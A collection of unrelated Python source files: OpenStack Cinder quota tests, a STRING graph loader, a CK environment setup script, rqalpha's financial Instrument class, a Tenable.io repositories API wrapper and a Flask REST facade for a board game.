assert value == r.json()['quota_set']['volumes']
def test_fail_on_unknown_quota():
_headers = headers()
r = requests.put(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
json={
"quota_set": {
"volumes101": 10
}},
headers=_headers)
assert 400 == r.status_code, r.text
assert 'Bad key' in r.json()['badRequest']['message']
def test_show_defaults():
_headers = headers()
r = requests.get(
CINDER_URL + '%s/os-quota-sets/defaults' % (ADMIN_TENANT,),
headers=_headers)
assert 200 == r.status_code, r.text
assert 'volumes' in r.json()['quota_set']
    print(r.json())
def test_delete():
_headers = headers()
r = requests.delete(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers)
assert 200 == r.status_code, r.text
value = 10 # default values for volumes
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers)
assert 200 == r.status_code, r.text
assert value == r.json()['quota_set']['volumes']
|
py | 7dfa851704df615c601007099d9088c094e1cfff | """
This file offers the methods to automatically retrieve the graph Nannizzia gypsea CBS 118893.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def NannizziaGypseaCbs118893(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Nannizzia gypsea CBS 118893 graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
        Whether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
        Whether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
    Instance of the Nannizzia gypsea CBS 118893 graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="NannizziaGypseaCbs118893",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
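# Illustrative call (a sketch):
#   graph = NannizziaGypseaCbs118893(directed=False, version="links.v11.5")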
|
py | 7dfa85d8ac6adf3e8a95272a49549d0967a16b08 | import os
from app import create_app
env = os.environ.get('APPNAME_ENV', 'dev')
application = create_app('app.settings.%sConfig' % env.capitalize())
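# e.g. APPNAME_ENV=prod resolves to 'app.settings.ProdConfig'; the default 'dev' resolves to
# 'app.settings.DevConfig' (assuming those config classes exist in app.settings).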
if __name__ == "__main__":
application.run() |
py | 7dfa86db6b1d0d378d67b4353d991432d8a91557 | #
# Collective Knowledge (individual environment - setup)
#
# See CK LICENSE.txt for licensing details
# See CK COPYRIGHT.txt for copyright details
#
# Developer: Grigori Fursin, [email protected], http://fursin.net
#
import os
##############################################################################
# setup environment
def setup(i):
"""
Input: {
cfg - meta of this soft entry
self_cfg - meta of module soft
ck_kernel - import CK kernel module (to reuse functions)
host_os_uoa - host OS UOA
host_os_uid - host OS UID
host_os_dict - host OS meta
target_os_uoa - target OS UOA
target_os_uid - target OS UID
target_os_dict - target OS meta
target_device_id - target device ID (if via ADB)
tags - list of tags used to search this entry
env - updated environment vars from meta
customize - updated customize vars from meta
deps - resolved dependencies for this soft
interactive - if 'yes', can ask questions, otherwise quiet
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
bat - prepared string for bat file
}
"""
import os
# Get variables
ck=i['ck_kernel']
s=''
iv=i.get('interactive','')
cus=i.get('customize',{})
fp=cus.get('full_path','')
env=i['env']
hosd=i['host_os_dict']
tosd=i['target_os_dict']
sdirs=hosd.get('dir_sep','')
# Check platform
hplat=hosd.get('ck_name','')
hproc=hosd.get('processor','')
tproc=tosd.get('processor','')
remote=tosd.get('remote','')
tbits=tosd.get('bits','')
pi=os.path.dirname(fp)
ep=cus['env_prefix']
env[ep]=pi
x=cus.get('file_model','')
if x!='':
env[ep+'_PT_NAME']=x
env[ep+'_PT']=pi+sdirs+x
x=cus.get('file_model_pttxt','')
if x!='':
env[ep+'_PTTXT_NAME']=x
env[ep+'_PTTXT']=pi+sdirs+x
x=cus.get('file_labels','')
if x!='':
env[ep+'_LABELS_NAME']=x
env[ep+'_LABELS']=pi+sdirs+x
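   # At this point env maps <env_prefix> to the model directory and, when present in the meta,
   # <env_prefix>_PT / _PTTXT / _LABELS to the frozen graph, text graph and label files respectively.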
# Call common script
r=ck.access({'action':'run', 'module_uoa':'script', 'data_uoa':'process-model',
'code':'common_vars', 'func':'process',
'dict':i})
if r['return']>0: return r
env.update(r['env'])
return {'return':0, 'bat':s}
|
py | 7dfa87c8aa4a182d72999259ff849cfa8f2f1f28 | # -*- coding: utf-8 -*-
# Copyright 2019 Shenzhen Ricequant Technology Co., Ltd. (hereinafter "Ricequant")
#
# This software may not be used except in compliance with the current license.
#
# * Non-commercial use (use by individuals for non-commercial purposes, or by universities, research
#     institutes and other non-profit organizations for education, research and similar purposes):
#     governed by the Apache License 2.0 (the "Apache 2.0 License"); a copy of the Apache 2.0 License
#     is available at http://www.apache.org/licenses/LICENSE-2.0.
#     Unless required by law or agreed to in writing, the software must be distributed under the current
#     license "AS IS", with no additional conditions attached.
#
# * Commercial use (use by individuals for any commercial purpose, or by legal persons or other
#     organizations for any purpose):
#     without Ricequant's authorization, no individual may use this software for any commercial purpose
#     (including but not limited to providing, selling, renting, lending or transferring to third parties
#     this software, derivatives of it, or products or services that reference or borrow its functionality
#     or source code), and no legal person or other organization may use it for any purpose; otherwise
#     Ricequant reserves the right to pursue liability for the corresponding intellectual-property infringement.
#     Subject to the above, use of this software must also comply with the Apache 2.0 License; where the
#     Apache 2.0 License conflicts with this license, this license prevails.
#     For the detailed authorization process, please contact [email protected].
import copy
import datetime
import numpy as np
from rqalpha.environment import Environment
from rqalpha.const import INSTRUMENT_TYPE, POSITION_DIRECTION, DEFAULT_ACCOUNT_TYPE
from rqalpha.utils import TimeRange, INST_TYPE_IN_STOCK_ACCOUNT
from rqalpha.utils.repr import property_repr, PropertyReprMeta
class Instrument(metaclass=PropertyReprMeta):
DEFAULT_LISTED_DATE = datetime.datetime(1990, 1, 1)
DEFAULT_DE_LISTED_DATE = datetime.datetime(2999, 12, 31)
@staticmethod
def _fix_date(ds, dflt):
if isinstance(ds, datetime.datetime):
return ds
if ds == '0000-00-00':
return dflt
year, month, day = ds.split('-')
return datetime.datetime(int(year), int(month), int(day))
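    # _fix_date examples: '2015-06-18' -> datetime(2015, 6, 18); the placeholder '0000-00-00' falls back
    # to the supplied default (DEFAULT_LISTED_DATE / DEFAULT_DE_LISTED_DATE above).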
__repr__ = property_repr
def __init__(self, dic, future_info_store=None):
self.__dict__ = copy.copy(dic)
self._future_info_store = future_info_store
if "listed_date" in dic:
self.__dict__["listed_date"] = self._fix_date(dic["listed_date"], self.DEFAULT_LISTED_DATE)
if "de_listed_date" in dic:
self.__dict__["de_listed_date"] = self._fix_date(dic["de_listed_date"], self.DEFAULT_DE_LISTED_DATE)
if "maturity_date" in self.__dict__:
self.__dict__["maturity_date"] = self._fix_date(dic["maturity_date"], self.DEFAULT_DE_LISTED_DATE)
if 'contract_multiplier' in dic:
if np.isnan(self.contract_multiplier):
raise RuntimeError("Contract multiplier of {} is not supposed to be nan".format(self.order_book_id))
@property
def order_book_id(self):
# type: () -> str
"""
        [str] Stocks: the security code, a unique identifier ending in '.XSHG' (Shanghai) or '.XSHE' (Shenzhen).
        Futures: the contract code, a unique identifier (the numeric part of CZCE contracts is zero-padded, e.g. 'ZC609' becomes 'ZC1609').
        Dominant continuous contracts are named UnderlyingSymbol+88 (e.g. 'IF88'); index continuous contracts use UnderlyingSymbol+99.
"""
return self.__dict__["order_book_id"]
@property
def symbol(self):
# type: () -> str
"""
        [str] Stocks: the short name of the security, e.g. '平安银行'. Futures: the short name of the contract, e.g. '沪深1005'.
"""
return self.__dict__["symbol"]
@property
def round_lot(self):
# type: () -> int
"""
        [int] Stocks: number of shares per board lot; one lot of China A shares is 100 shares. Futures: always 1.
"""
return self.__dict__["round_lot"]
@property
def listed_date(self):
# type: () -> datetime.datetime
"""
        [datetime] Stocks: the listing date of the security. Futures: the listing date of the contract; both dominant and index continuous contracts use datetime(1990, 1, 1).
"""
return self.__dict__["listed_date"]
@property
def de_listed_date(self):
# type: () -> datetime.datetime
"""
        [datetime] Stocks: the delisting date. Futures: the delivery date.
"""
return self.__dict__["de_listed_date"]
@property
def type(self):
# type: () -> str
"""
        [str] Instrument type; currently supported types are 'CS', 'INDX', 'LOF', 'ETF', 'Future'.
"""
return INSTRUMENT_TYPE[self.__dict__["type"]]
@property
def exchange(self):
# type: () -> str
"""
        [str] Exchange. Stocks: 'XSHE' - Shenzhen Stock Exchange, 'XSHG' - Shanghai Stock Exchange.
        Futures: 'DCE' - Dalian Commodity Exchange, 'SHFE' - Shanghai Futures Exchange,
        'CFFEX' - China Financial Futures Exchange, 'CZCE' - Zhengzhou Commodity Exchange.
"""
return self.__dict__["exchange"]
@property
def market_tplus(self):
# type: () -> int
"""
        [int] Minimum number of trading days required between buying and selling the instrument, e.g. 1 for A shares.
        For public mutual funds market_tplus defaults to 0.
"""
return self.__dict__.get("market_tplus") or 0
@property
def sector_code(self):
"""
        [str] Sector code abbreviation, following the globally used standard definition (stocks only).
"""
try:
return self.__dict__["sector_code"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'sector_code' ".format(self.order_book_id)
)
@property
def sector_code_name(self):
"""
        [str] Sector name in the local language (stocks only).
"""
try:
return self.__dict__["sector_code_name"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'sector_code_name' ".format(self.order_book_id)
)
@property
def industry_code(self):
"""
        [str] National economic industry classification code; see the "Industry" list for details (stocks only).
"""
try:
return self.__dict__["industry_code"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'industry_code' ".format(self.order_book_id)
)
@property
def industry_name(self):
"""
        [str] National economic industry classification name (stocks only).
"""
try:
return self.__dict__["industry_name"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'industry_name' ".format(self.order_book_id)
)
@property
def concept_names(self):
"""
        [str] Concept classifications, e.g. '铁路基建' (railway infrastructure), '基金重仓' (heavily held by funds) (stocks only).
"""
try:
return self.__dict__["concept_names"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'concept_names' ".format(self.order_book_id)
)
@property
def board_type(self):
"""
        [str] Board type: 'MainBoard' - main board, 'GEM' - growth enterprise market (stocks only).
"""
try:
return self.__dict__["board_type"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'board_type' ".format(self.order_book_id)
)
@property
def status(self):
"""
        [str] Instrument status: 'Active' - normally listed, 'Delisted' - delisted, 'TemporarySuspended' - listing suspended,
        'PreIPO' - in the issuance/placement period, 'FailIPO' - issuance failed (stocks only).
"""
try:
return self.__dict__["status"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'status' ".format(self.order_book_id)
)
@property
def special_type(self):
"""
        [str] Special-treatment status: 'Normal' - normally listed, 'ST' - special treatment, 'StarST' - *ST, the stock is under a delisting warning,
        'PT' - the stock has had negative revenue for 3 consecutive years and will be suspended from trading, 'Other' - other (stocks only).
"""
try:
return self.__dict__["special_type"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'special_type' ".format(self.order_book_id)
)
@property
def contract_multiplier(self):
"""
        [float] Contract multiplier, e.g. 300.0 for CSI 300 index futures (futures only).
"""
return self.__dict__.get('contract_multiplier', 1)
@property
def margin_rate(self):
"""
        [float] Minimum margin rate of the contract (futures only).
"""
return self.__dict__.get("margin_rate", 1)
@property
def underlying_order_book_id(self):
"""
        [str] Code of the underlying instrument; currently 'null' for all futures except index futures (IH, IF, IC) (futures only).
"""
try:
return self.__dict__["underlying_order_book_id"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'underlying_order_book_id' ".format(self.order_book_id)
)
@property
def underlying_symbol(self):
"""
        [str] Symbol of the underlying instrument; currently 'null' for all futures except index futures (IH, IF, IC) (futures only).
"""
try:
return self.__dict__["underlying_symbol"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'underlying_symbol' ".format(self.order_book_id)
)
@property
def maturity_date(self):
# type: () -> datetime.datetime
"""
        [datetime] Maturity date.
"""
try:
return self.__dict__["maturity_date"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'maturity_date' ".format(self.order_book_id)
)
@property
def settlement_method(self):
"""
        [str] Settlement method: 'CashSettlementRequired' - cash settlement, 'PhysicalSettlementRequired' - physical delivery (futures only).
"""
try:
return self.__dict__["settlement_method"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'settlement_method' ".format(self.order_book_id)
)
@property
def listing(self):
"""
        [bool] Whether the instrument is tradable on the current trading date.
"""
trading_dt = Environment.get_instance().trading_dt
return self.listing_at(trading_dt)
@property
def listed(self):
"""
        [bool] Whether the instrument has been listed as of the current trading date.
"""
return self.listed_at(Environment.get_instance().trading_dt)
@property
def de_listed(self):
"""
        [bool] Whether the instrument has been delisted as of the current trading date.
"""
return self.de_listed_at(Environment.get_instance().trading_dt)
@property
def account_type(self):
if self.type in INST_TYPE_IN_STOCK_ACCOUNT:
return DEFAULT_ACCOUNT_TYPE.STOCK
elif self.type == INSTRUMENT_TYPE.FUTURE:
return DEFAULT_ACCOUNT_TYPE.FUTURE
else:
raise NotImplementedError
def listing_at(self, dt):
"""
        Whether the instrument is tradable on the given date.
:param dt: datetime.datetime
:return: bool
"""
return self.listed_at(dt) and not self.de_listed_at(dt)
def listed_at(self, dt):
"""
        Whether the instrument has been listed by the given date.
:param dt: datetime.datetime
:return: bool
"""
return self.listed_date <= dt
def de_listed_at(self, dt):
"""
        Whether the instrument has been delisted by the given date.
:param dt: datetime.datetime
:return: bool
"""
if self.type in (INSTRUMENT_TYPE.FUTURE, INSTRUMENT_TYPE.OPTION):
return dt.date() > self.de_listed_date.date()
else:
return dt >= self.de_listed_date
STOCK_TRADING_PERIOD = [
TimeRange(start=datetime.time(9, 31), end=datetime.time(11, 30)),
TimeRange(start=datetime.time(13, 1), end=datetime.time(15, 0)),
]
@property
def trading_hours(self):
# trading_hours='09:31-11:30,13:01-15:00'
try:
trading_hours = self.__dict__["trading_hours"]
except KeyError:
if self.type in INST_TYPE_IN_STOCK_ACCOUNT:
return self.STOCK_TRADING_PERIOD
return None
trading_period = []
trading_hours = trading_hours.replace("-", ":")
for time_range_str in trading_hours.split(","):
start_h, start_m, end_h, end_m = (int(i) for i in time_range_str.split(":"))
start, end = datetime.time(start_h, start_m), datetime.time(end_h, end_m)
if start > end:
trading_period.append(TimeRange(start, datetime.time(23, 59)))
trading_period.append(TimeRange(datetime.time(0, 0), end))
else:
trading_period.append(TimeRange(start, end))
return trading_period
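    # trading_hours parsing example: '09:31-11:30,13:01-15:00' becomes two TimeRange entries; a night
    # session such as '21:01-02:30' (start > end) is split into 21:01-23:59 and 00:00-02:30.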
@property
def trade_at_night(self):
return any(r.start <= datetime.time(4, 0) or r.end >= datetime.time(19, 0) for r in (self.trading_hours or []))
def days_from_listed(self):
if self.listed_date == self.DEFAULT_LISTED_DATE:
return -1
date = Environment.get_instance().trading_dt.date()
if self.de_listed_date.date() < date:
return -1
ipo_days = (date - self.listed_date.date()).days
return ipo_days if ipo_days >= 0 else -1
def days_to_expire(self):
if self.type != 'Future' or self.order_book_id[-2:] == '88' or self.order_book_id[-2:] == '99':
return -1
date = Environment.get_instance().trading_dt.date()
days = (self.maturity_date.date() - date).days
return -1 if days < 0 else days
def tick_size(self):
if self.type in (INSTRUMENT_TYPE.CS, INSTRUMENT_TYPE.INDX):
return 0.01
elif self.type in ("ETF", "LOF"):
return 0.001
elif self.type == INSTRUMENT_TYPE.FUTURE:
return self._future_info_store.get_future_info(self)["tick_size"]
else:
raise NotImplementedError
def calc_cash_occupation(self, price, quantity, direction):
# type: (float, float, POSITION_DIRECTION) -> float
if self.type in INST_TYPE_IN_STOCK_ACCOUNT:
return price * quantity
elif self.type == INSTRUMENT_TYPE.FUTURE:
margin_multiplier = Environment.get_instance().config.base.margin_multiplier
return price * quantity * self.contract_multiplier * self.margin_rate * margin_multiplier
else:
raise NotImplementedError
class SectorCodeItem(object):
def __init__(self, cn, en, name):
self.__cn = cn
self.__en = en
self.__name = name
@property
def cn(self):
return self.__cn
@property
def en(self):
return self.__en
@property
def name(self):
return self.__name
def __repr__(self):
return "{}: {}, {}".format(self.__name, self.__en, self.__cn)
class SectorCode(object):
Energy = SectorCodeItem("能源", "energy", 'Energy')
Materials = SectorCodeItem("原材料", "materials", 'Materials')
ConsumerDiscretionary = SectorCodeItem("非必需消费品", "consumer discretionary", 'ConsumerDiscretionary')
ConsumerStaples = SectorCodeItem("必需消费品", "consumer staples", 'ConsumerStaples')
HealthCare = SectorCodeItem("医疗保健", "health care", 'HealthCare')
Financials = SectorCodeItem("金融", "financials", 'Financials')
InformationTechnology = SectorCodeItem("信息技术", "information technology", 'InformationTechnology')
TelecommunicationServices = SectorCodeItem("电信服务", "telecommunication services", 'TelecommunicationServices')
Utilities = SectorCodeItem("公共服务", "utilities", 'Utilities')
Industrials = SectorCodeItem("工业", "industrials", "Industrials")
class IndustryCodeItem(object):
def __init__(self, code, name):
self.__code = code
self.__name = name
@property
def code(self):
return self.__code
@property
def name(self):
return self.__name
def __repr__(self):
return "{0}:{1}".format(self.__code, self.__name)
class IndustryCode(object):
A01 = IndustryCodeItem("A01", "农业")
A02 = IndustryCodeItem("A02", "林业")
A03 = IndustryCodeItem("A03", "畜牧业")
A04 = IndustryCodeItem("A04", "渔业")
A05 = IndustryCodeItem("A05", "农、林、牧、渔服务业")
B06 = IndustryCodeItem("B06", "煤炭开采和洗选业")
B07 = IndustryCodeItem("B07", "石油和天然气开采业")
B08 = IndustryCodeItem("B08", "黑色金属矿采选业")
B09 = IndustryCodeItem("B09", "有色金属矿采选业")
B10 = IndustryCodeItem("B10", "非金属矿采选业")
B11 = IndustryCodeItem("B11", "开采辅助活动")
B12 = IndustryCodeItem("B12", "其他采矿业")
C13 = IndustryCodeItem("C13", "农副食品加工业")
C14 = IndustryCodeItem("C14", "食品制造业")
C15 = IndustryCodeItem("C15", "酒、饮料和精制茶制造业")
C16 = IndustryCodeItem("C16", "烟草制品业")
C17 = IndustryCodeItem("C17", "纺织业")
C18 = IndustryCodeItem("C18", "纺织服装、服饰业")
C19 = IndustryCodeItem("C19", "皮革、毛皮、羽毛及其制品和制鞋业")
C20 = IndustryCodeItem("C20", "木材加工及木、竹、藤、棕、草制品业")
C21 = IndustryCodeItem("C21", "家具制造业")
C22 = IndustryCodeItem("C22", "造纸及纸制品业")
C23 = IndustryCodeItem("C23", "印刷和记录媒介复制业")
C24 = IndustryCodeItem("C24", "文教、工美、体育和娱乐用品制造业")
C25 = IndustryCodeItem("C25", "石油加工、炼焦及核燃料加工业")
C26 = IndustryCodeItem("C26", "化学原料及化学制品制造业")
C27 = IndustryCodeItem("C27", "医药制造业")
C28 = IndustryCodeItem("C28", "化学纤维制造业")
C29 = IndustryCodeItem("C29", "橡胶和塑料制品业")
C30 = IndustryCodeItem("C30", "非金属矿物制品业")
C31 = IndustryCodeItem("C31", "黑色金属冶炼及压延加工业")
C32 = IndustryCodeItem("C32", "有色金属冶炼和压延加工业")
C33 = IndustryCodeItem("C33", "金属制品业")
C34 = IndustryCodeItem("C34", "通用设备制造业")
C35 = IndustryCodeItem("C35", "专用设备制造业")
C36 = IndustryCodeItem("C36", "汽车制造业")
C37 = IndustryCodeItem("C37", "铁路、船舶、航空航天和其它运输设备制造业")
C38 = IndustryCodeItem("C38", "电气机械及器材制造业")
C39 = IndustryCodeItem("C39", "计算机、通信和其他电子设备制造业")
C40 = IndustryCodeItem("C40", "仪器仪表制造业")
C41 = IndustryCodeItem("C41", "其他制造业")
C42 = IndustryCodeItem("C42", "废弃资源综合利用业")
C43 = IndustryCodeItem("C43", "金属制品、机械和设备修理业")
D44 = IndustryCodeItem("D44", "电力、热力生产和供应业")
D45 = IndustryCodeItem("D45", "燃气生产和供应业")
D46 = IndustryCodeItem("D46", "水的生产和供应业")
E47 = IndustryCodeItem("E47", "房屋建筑业")
E48 = IndustryCodeItem("E48", "土木工程建筑业")
E49 = IndustryCodeItem("E49", "建筑安装业")
E50 = IndustryCodeItem("E50", "建筑装饰和其他建筑业")
F51 = IndustryCodeItem("F51", "批发业")
F52 = IndustryCodeItem("F52", "零售业")
G53 = IndustryCodeItem("G53", "铁路运输业")
G54 = IndustryCodeItem("G54", "道路运输业")
G55 = IndustryCodeItem("G55", "水上运输业")
G56 = IndustryCodeItem("G56", "航空运输业")
G57 = IndustryCodeItem("G57", "管道运输业")
G58 = IndustryCodeItem("G58", "装卸搬运和运输代理业")
G59 = IndustryCodeItem("G59", "仓储业")
G60 = IndustryCodeItem("G60", "邮政业")
H61 = IndustryCodeItem("H61", "住宿业")
H62 = IndustryCodeItem("H62", "餐饮业")
I63 = IndustryCodeItem("I63", "电信、广播电视和卫星传输服务")
I64 = IndustryCodeItem("I64", "互联网和相关服务")
I65 = IndustryCodeItem("I65", "软件和信息技术服务业")
J66 = IndustryCodeItem("J66", "货币金融服务")
J67 = IndustryCodeItem("J67", "资本市场服务")
J68 = IndustryCodeItem("J68", "保险业")
J69 = IndustryCodeItem("J69", "其他金融业")
K70 = IndustryCodeItem("K70", "房地产业")
L71 = IndustryCodeItem("L71", "租赁业")
L72 = IndustryCodeItem("L72", "商务服务业")
M73 = IndustryCodeItem("M73", "研究和试验发展")
M74 = IndustryCodeItem("M74", "专业技术服务业")
M75 = IndustryCodeItem("M75", "科技推广和应用服务业")
N76 = IndustryCodeItem("N76", "水利管理业")
N77 = IndustryCodeItem("N77", "生态保护和环境治理业")
N78 = IndustryCodeItem("N78", "公共设施管理业")
O79 = IndustryCodeItem("O79", "居民服务业")
O80 = IndustryCodeItem("O80", "机动车、电子产品和日用产品修理业")
O81 = IndustryCodeItem("O81", "其他服务业")
P82 = IndustryCodeItem("P82", "教育")
Q83 = IndustryCodeItem("Q83", "卫生")
Q84 = IndustryCodeItem("Q84", "社会工作")
R85 = IndustryCodeItem("R85", "新闻和出版业")
R86 = IndustryCodeItem("R86", "广播、电视、电影和影视录音制作业")
R87 = IndustryCodeItem("R87", "文化艺术业")
R88 = IndustryCodeItem("R88", "体育")
R89 = IndustryCodeItem("R89", "娱乐业")
S90 = IndustryCodeItem("S90", "综合")
|
py | 7dfa880f192d4a315e8d83f717dc2ae581bfa50a | '''
Repositories
============
The following methods allow for interaction into the Tenable.io
Container Security :devportal:`repositories <cs-v2-repositories>`
API endpoints.
Methods available on ``tio.cs.repositories``:
.. rst-class:: hide-signature
.. autoclass:: RepositoriesAPI
:members:
'''
from typing import Optional, Dict, Union
from restfly.utils import dict_clean
from tenable.base.endpoint import APIEndpoint
from tenable.io.cs.iterator import CSIterator
class RepositoriesAPI(APIEndpoint):
_path = 'container_security/api/v2/repositories'
_box = True
_box_attrs = {'camel_killer_box': True}
def list(self, # noqa: PLC0103,PLR0913
name: Optional[str] = None,
contains: Optional[str] = None,
offset: int = 0,
limit: int = 1000,
return_json: bool = False
) -> Union[Dict, CSIterator]:
'''
        Returns the list of repositories stored within Container Security.
:devportal:`API Documentation <container-security-v2-list-repositories>` # noqa: E501
Args:
            name (str, optional):
                Repository name to filter on. The filter is case-sensitive
                and enforces an exact match.
contains (str, optional):
Partial name to filter on. Filter is case-sensitive.
offset (int, optional):
The number of records to skip before starting to return data.
limit (int, optional):
The number of records to return for each page of data.
            return_json (bool, optional):
                If set, the response will be returned as a Dict object instead
                of an iterable.
Examples:
Using the default iterable:
>>> for repo in tio.cs.repositories.list():
... print(repo)
Getting the raw JSON response:
>>> resp = tio.cs.repositories.list(return_json=True)
>>> for item in resp['items']:
... print(item)
'''
params = dict_clean({
'offset': offset,
'limit': limit,
'name': name,
'contains': contains,
})
if return_json:
return self._get(params=params)
return CSIterator(self._api,
_path=self._path,
_params=params,
_limit=limit,
_offset=offset
)
def details(self, name: str) -> Dict:
'''
Returns the details for the specified repository.
:devportal:`API Documentation <container-security-v2-get-repository-details>` # noqa: E501
Args:
name (str):
The repository name.
Examples:
>>> tio.cs.repositories.details('centos')
'''
return self._get(name)
def delete(self, name: str) -> None:
'''
        Deletes the specified repository.
:devportal:`API Documentation <container-security-v2-delete-repository>` # noqa: E501
Args:
name (str):
The repository name.
Examples:
>>> tio.cs.repositories.delete('centos')
'''
self._delete(name)
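# Illustrative usage sketch (not part of the original module). It assumes a
# configured TenableIO client; the key values below are placeholders.
if __name__ == '__main__':
    from tenable.io import TenableIO
    tio = TenableIO('ACCESS_KEY', 'SECRET_KEY')
    # Page through every repository whose name contains "cent".
    for repo in tio.cs.repositories.list(contains='cent'):
        print(repo)
    # Fetch the details of a single repository, then remove it.
    print(tio.cs.repositories.details('centos'))
    tio.cs.repositories.delete('centos')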
|
py | 7dfa88453325d7ad30fda08b6234f7e9152715be | from flask import Flask, escape, request, abort
from conexiones.auth_client import AuthClient
from conexiones.hub_client import HubClient
from juego.partida import Partida
from juego.datos.jugador import Jugador
from juego.fabrica_tres_raya import FabricaTresRaya
from juego.fabrica_conecta_cuatro import FabricaConectaCuatro
import json
import os
class RestApi:
""" Clase fachada de la API REST
---
Esta clase es una fachada con las operaciones proporcionadas a través de la API REST.
"""
JUEGOS = {"TresRaya" : FabricaTresRaya,
"Conecta4" : FabricaConectaCuatro}
def __init__(self, tipo):
""" Constructor.
---
        Parameters:
            - tipo: String containing the name of the game.
"""
self.__fabrica_juego = RestApi.JUEGOS.get(tipo)()
self.__partida = Partida(self.__fabrica_juego)
self.__finalizar = False
game = os.getenv('GAME')
host = os.getenv('GAME_SERVER_HOST', '172.0.0.1')
port = os.getenv('GAME_SERVER_PORT', 6789)
HubClient.instance().register(game, host, port)
def status(self, request):
""" Controlador de estado.
---
Siempre devuelve una tupla con el código de estado 200 y un mensaje "OK".
"""
return (200, 'OK')
def registrar_jugador(self, request):
""" Registra un jugador en la partida.
---
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, 'OK') cuando se ha registrado con éxito.
- (401, 'Unauthorized') cuando el token es invalido.
- (500, 'Server error') cuando la partida esta llena.
"""
token = request.form['token']
auth = AuthClient.instance()
if not auth.validate_token(token):
return (401, 'Unauthorized')
jugador = Jugador(token)
if not self.__partida.registrar_jugador(jugador):
return (500, 'Server error')
return (200, 'OK')
def comprobar_turno(self, request):
""" Comprueba el turno de un jugador.
---
Devuelve True si el jugador tiene el turno, sino False.
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, True o False) comprobación correcta.
- (401, 'Unauthorized') cuando el token es invalido.
"""
token = request.form['token']
auth = AuthClient.instance()
if not auth.validate_token(token):
return (401, 'Unauthorized')
turno = self.__partida.obtener_turno().obtener_token() == token
return (200, json.dumps(turno))
def realizar_jugada(self, request):
""" Realiza una jugada en la partida.
---
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, 'OK') cuando se ha realizado con éxito.
- (400, 'Bad Request') cuando las coordenadas son invalidas o la partida esta acabada.
- (401, 'Unauthorized') cuando el token es invalido.
"""
token = request.form['token']
auth = AuthClient.instance()
turno = self.__partida.obtener_turno()
if not auth.validate_token(token) or turno.obtener_token() != token:
return (401, 'Unauthorized')
try:
x = int(request.form['x'])
y = int(request.form['y'])
self.__partida.jugar(x,y)
return (200, 'OK')
except:
return (400, 'Bad Request')
def obtener_tablero(self, request):
""" Devuelve el tablero en forma de matriz.
---
El tablero esta en formato JSON.
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, 'OK') cuando se ha devuelto con éxito.
"""
tablero = self.__partida.obtener_tablero().obtener_array()
out = [[None if pieza is None else str(pieza) for pieza in x] for x in tablero]
